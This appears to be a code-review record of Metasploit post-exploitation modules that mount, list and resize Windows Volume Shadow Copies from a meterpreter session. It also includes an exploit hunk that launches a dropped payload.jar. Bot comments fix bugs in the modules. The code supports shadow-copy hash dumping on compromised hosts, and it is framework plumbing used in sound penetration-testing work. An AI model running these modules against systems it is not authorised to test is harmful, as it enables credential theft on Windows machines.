'host.shadowcopies',
'text/plain',
session,
list,
'shadowcopies.txt',
'Shadow Copy Info'
)
end
end
end
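Review bot: when vss_list returns an empty array the module exits without printing anything, so the user cannot distinguish "no shadow copies" from "nothing happened"; add a print_status for the empty case. Inside the loop `tbl.to_s` is called twice per copy (once for `list`, once for print_good); render it once into a local and reuse it for both the output and store_loot. The author string is again missing its closing `>`, and 'Version' => '$Revision$' is absent.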


@ -0,0 +1,70 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/windows/shadowcopy'
require 'msf/core/post/windows/priv'
class Metasploit3 < Msf::Post
include Msf::Post::Windows::Priv
include Msf::Post::Windows::ShadowCopy
def initialize(info={})
super(update_info(info,
'Name' => "Windows Manage Mount Shadow Copy",
'Description' => %q{
This module will attempt to mount a Volume Shadow Copy
on the system. This is based on the VSSOwn Script
originally posted by Tim Tomes and Mark Baggett.
Works on win2k3 and later.
},
'License' => MSF_LICENSE,
'Platform' => ['windows'],
'SessionTypes' => ['meterpreter'],
'Author' => ['thelightcosine <thelightcosine[at]metasploit.com'],
'References' => [
[ 'URL', 'http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html' ]
]
))
register_options(
[
OptString.new('DEVICE', [ true, 'DeviceObject of Shadowcopy to mount.' ]),
OptString.new('PATH', [ true, 'Path to mount it to.' ])
], self.class)
end
def run
unless is_admin?
print_error("This module requires admin privs to run")
return
end
if is_uac_enabled?
print_error("This module requires UAC to be bypassed first")
return
end
unless start_vss
return
end
r = session.sys.process.execute("cmd.exe /C mklink /D #{datastore['DEVICE']} #{datastore['PATH']}", nil, {'Hidden' => true})
end
end
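Review bot: the mklink argument order looks reversed. `mklink /D <Link> <Target>` creates a directory link named by the first argument that points at the second, but `cmd.exe /C mklink /D #{datastore['DEVICE']} #{datastore['PATH']}` puts the DeviceObject first, so it tries to create a link named after the shadow copy device and point it at PATH; the option descriptions ("DeviceObject of Shadowcopy to mount" and "Path to mount it to") say the opposite is intended, i.e. link at PATH, target DEVICE. The return value `r` is never used and neither the command output nor the exit status is checked, so the user gets no success or failure message; run execute with 'Channelized' => true and print what cmd.exe returns, or at least print_status the command that was issued. DEVICE and PATH are interpolated unquoted into the cmd.exe line, so a path containing a space breaks the command; wrap both in double quotes. The author string is missing its closing `>` and there is no 'Version' => '$Revision$'.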


@ -0,0 +1,71 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/windows/shadowcopy'
require 'msf/core/post/windows/priv'
class Metasploit3 < Msf::Post
include Msf::Post::Windows::Priv
include Msf::Post::Windows::ShadowCopy
def initialize(info={})
super(update_info(info,
'Name' => "Windows Manage Set Shadow Copy Storage Space",
'Description' => %q{
This module will attempt to change the ammount of space
for volume shadow copy storage. This is based on the
VSSOwn Script originally posted by Tim Tomes and
Mark Baggett.
Works on win2k3 and later.
},
'License' => MSF_LICENSE,
'Platform' => ['windows'],
'SessionTypes' => ['meterpreter'],
'Author' => ['thelightcosine <thelightcosine[at]metasploit.com'],
'References' => [
[ 'URL', 'http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html' ]
]
))
register_options(
[
OptInt.new('SIZE', [ true, 'Size in bytes to set for Max Storage'])
], self.class)
end
def run
unless is_admin?
print_error("This module requires admin privs to run")
return
end
if is_uac_enabled?
print_error("This module requires UAC to be bypassed first")
return
end
unless start_vss
return
end
if vss_set_storage(datastore['SIZE'])
print_good("Size upated successfully")
else
print_error("There was a problem updating the storage size")
end
end
end
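Review bot: two typos in user-facing strings: "ammount of space" in the description and "Size upated successfully" in the success message. SIZE is an OptInt described as "Size in bytes to set for Max Storage"; print the value actually applied in the print_good line so the operator can confirm the unit was interpreted as intended. The author string is again missing its closing `>` and 'Version' => '$Revision$' is absent.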


@ -0,0 +1,80 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/windows/shadowcopy'
require 'msf/core/post/windows/priv'
class Metasploit3 < Msf::Post
include Msf::Post::Windows::Priv
include Msf::Post::Windows::ShadowCopy
def initialize(info={})
super(update_info(info,
'Name' => "Windows Manage Get Shadow Copy Storage Info",
'Description' => %q{
This module will attempt to get volume shadow copy storage info.
This is based on the VSSOwn Script originally posted by
Tim Tomes and Mark Baggett.
Works on win2k3 and later.
},
'License' => MSF_LICENSE,
'Platform' => ['windows'],
'SessionTypes' => ['meterpreter'],
'Author' => ['thelightcosine <thelightcosine[at]metasploit.com'],
'References' => [
[ 'URL', 'http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html' ]
]
))
end
def run
unless is_admin?
print_error("This module requires admin privs to run")
return
end
if is_uac_enabled?
print_error("This module requires UAC to be bypassed first")
return
end
unless start_vss
return
end
storage_data = vss_get_storage
if storage_data
tbl = Rex::Ui::Text::Table.new(
'Header' => 'Shadow Copy Storage Data',
'Indent' => 1,
'Columns' => ['Field', 'Value']
)
storage_data.each_pair{|k,v| tbl << [k,v]}
print_good(tbl.to_s)
store_loot(
'host.shadowstorage',
'text/plain',
session,
tbl.to_s,
'shadowstorage.txt',
'Shadow Copy Storage Info'
)
end
end
end
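Review bot: when vss_get_storage returns nil the module ends silently; add a print_error in an else branch so a failed query is distinguishable from empty output. The author string `'thelightcosine <thelightcosine[at]metasploit.com'` is missing its closing `>`, and the 'Version' => '$Revision$' entry present in the other modules in this commit is absent.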


@ -50,7 +50,8 @@ class Metasploit3 < Msf::Exploit::Remote
fd.write(@jar_data)
end
framework.threads.spawn("Module(#{self.refname})-JavaLauncher", false) { system("java -jar payload.jar") }
pid = Process.spawn("java -jar payload.jar &")
Process.detach pid
end
end
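Review bot: `Process.spawn("java -jar payload.jar &")` mixes two ways of backgrounding the process. The trailing `&` forces Ruby to run the string through /bin/sh, the shell backgrounds java and exits, so the pid returned (and handed to Process.detach) is the shell's, not java's, and the detach is then redundant. Use the argv form `Process.spawn("java", "-jar", "payload.jar")` followed by Process.detach, which avoids the shell and returns java's own pid. `payload.jar` is also resolved against the framework's current working directory; pass the same path the `fd.write(@jar_data)` block just above wrote to, as an absolute path. Process.spawn only exists on Ruby 1.9+, which matters if the framework still claims 1.8 support.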